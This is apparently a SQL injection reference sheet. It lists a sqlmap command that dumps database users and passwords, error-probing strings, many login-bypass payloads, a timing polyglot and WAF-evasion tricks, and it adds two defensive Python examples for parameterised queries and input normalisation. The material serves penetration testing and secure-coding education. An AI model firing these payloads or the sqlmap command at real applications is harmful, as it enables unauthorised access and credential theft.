2016-10-18 06:39:17 +00:00

# SQL injection

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.

## SQL injection using SQLmap

```
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
```

## Entry point detection

Detection of an SQL injection entry point: strings that commonly cause an error or a changed response when a parameter is interpolated unsafely into a query.

```
'
"
%27
" / %22
; / %3B
%%2727
%25%27
`+HERP
'||'DERP
'+'herp
' ' DERP
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (')
```

## Authentication bypass

```
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
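As an added example (not part of the original cheat sheet), the login query these payloads target, built by string concatenation, beside the parameterised version that the same payloads cannot alter. It runs in Python against an in-memory SQLite database with one constructed account; the four attempts are taken from the list above (SQLite accepts `--` comments, so the MySQL-only `#` variants are left out).

```python
import sqlite3

# Constructed sample data for the demo: one account with a made-up password.
SETUP = [
    "CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)",
    "INSERT INTO users VALUES ('admin', 'correct horse battery staple')",
]

# (username, password) pairs built from payloads in the list above. The
# comment-based ones go in the username field and cut off the password check;
# the OR-clause one goes in the password field so it ORs away the whole WHERE.
BYPASS_ATTEMPTS = [
    ("admin' --", "wrong-password"),
    ("admin' or 1=1--", "wrong-password"),
    ("admin' or '1'='1'--", "wrong-password"),
    ("admin", "' or '1'='1"),
]


def open_db():
    conn = sqlite3.connect(":memory:")
    for stmt in SETUP:
        conn.execute(stmt)
    return conn


def login_vulnerable(conn, username, password):
    """The 'before' side: SQL text assembled from user input, so a quote or a
    comment marker in the input rewrites the statement instead of being data."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterised(conn, username, password):
    """Same check with bound parameters: values travel separately from the
    statement, so quotes and comment markers stay inside the value."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def bypass_results(login):
    """Map each attempt to whether `login` accepted it (none should)."""
    conn = open_db()
    return {u + " / " + p: login(conn, u, p) for u, p in BYPASS_ATTEMPTS}


def legitimate_login(login):
    """The real credentials must still work with either implementation."""
    return login(open_db(), "admin", "correct horse battery staple")
```

`bypass_results(login_vulnerable)` returns True for every attempt, `bypass_results(login_parameterised)` returns False for every one, and both accept the real credentials.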

## Polyglot injection (multicontext)

```
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```

## WAF Bypass

No Whitespace - bypass using comments

```
?id=1/*comment*/and/**/1=1/**/--
```

No Whitespace - bypass using parentheses

```
?id=(1)and(1)=(1)--
```

No Comma - bypass using OFFSET and FROM

```
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1)
```

Blacklist using keywords - bypass using uppercase/lowercase

```
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```

Blacklist using keywords case insensitive - bypass using equivalent

```
AND -> &&
OR -> ||
= -> LIKE, REGEXP, not < and not >
WHERE -> HAVING
```
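The evasions above all work against filters that match the raw parameter value. As an added example (not from the original page), a small normaliser that undoes them (comments as whitespace, parentheses as token separators, mixed case, `&&`/`||` for `AND`/`OR`, `LIKE`/`REGEXP` for `=`) before a tautology check runs; the sample values are constructed from the list above and are already URL-decoded, as a WAF or log parser would see them.

```python
import re
from urllib.parse import unquote_plus

# Constructed parameter values (URL-decoded) taken from the evasions listed
# above, plus two benign ones that must not be flagged.
SAMPLE_VALUES = [
    "1/*comment*/and/**/1=1/**/--",   # whitespace replaced by comments
    "(1)and(1)=(1)--",                # whitespace replaced by parentheses
    "1 AnD 1=1#",                     # mixed case
    "1 && 1=1",                       # AND written as &&
    "1 || 'a' LIKE 'a'",              # OR as ||, = as LIKE
    "42",                             # benign
    "order by name",                  # benign: 'or' inside a word
]

COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Canonical tautology shape after normalisation: and/or, then a number or a
# quoted string (optionally parenthesised), compared with =, LIKE or REGEXP.
TAUTOLOGY = re.compile(
    r"\b(and|or)\s+\(?\s*(\d+|'[^']*')\s*\)?\s*(=|\blike\b|\bregexp\b)"
)


def normalise(value):
    """Rewrite the value so the evasions above collapse to one plain form."""
    v = unquote_plus(value)
    v = COMMENT.sub(" ", v)                 # MySQL treats /**/ as whitespace
    v = re.sub(r"([()])", r" \1 ", v)       # parentheses separate tokens too
    v = v.replace("&&", " and ").replace("||", " or ")
    return re.sub(r"\s+", " ", v).strip().lower()


def is_tautology(value):
    return TAUTOLOGY.search(normalise(value)) is not None


def flagged(values=SAMPLE_VALUES):
    """Return the values a keyword filter would miss but this check catches."""
    return [v for v in values if is_tautology(v)]
```

Normalising narrows the gap but does not close it (the keyword-equivalent list above is open-ended), which is why the fix on the application side is parameterised queries rather than a better blacklist.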

## Thanks to - Other resources

* MySQL:
  - [PentestMonkey's MySQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
  - [Reiners' MySQL injection filter evasion cheat sheet](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* MSSQL:
  - [EvilSQL's Error/Union/Blind MSSQL cheat sheet](http://evilsql.com/main/page2.php)
  - [PentestMonkey's MSSQL SQLi injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* ORACLE:
  - [PentestMonkey's Oracle SQLi cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* POSTGRESQL:
  - [PentestMonkey's Postgres SQLi cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* Others:
  - [Access SQLi cheat sheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
  - [PentestMonkey's Ingres SQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
  - [PentestMonkey's DB2 SQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
  - [PentestMonkey's Informix SQL injection cheat sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
  - [SQLite3 injection cheat sheet](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
  - [Ruby on Rails (Active Record) SQL injection guide](http://rails-sqli.org/)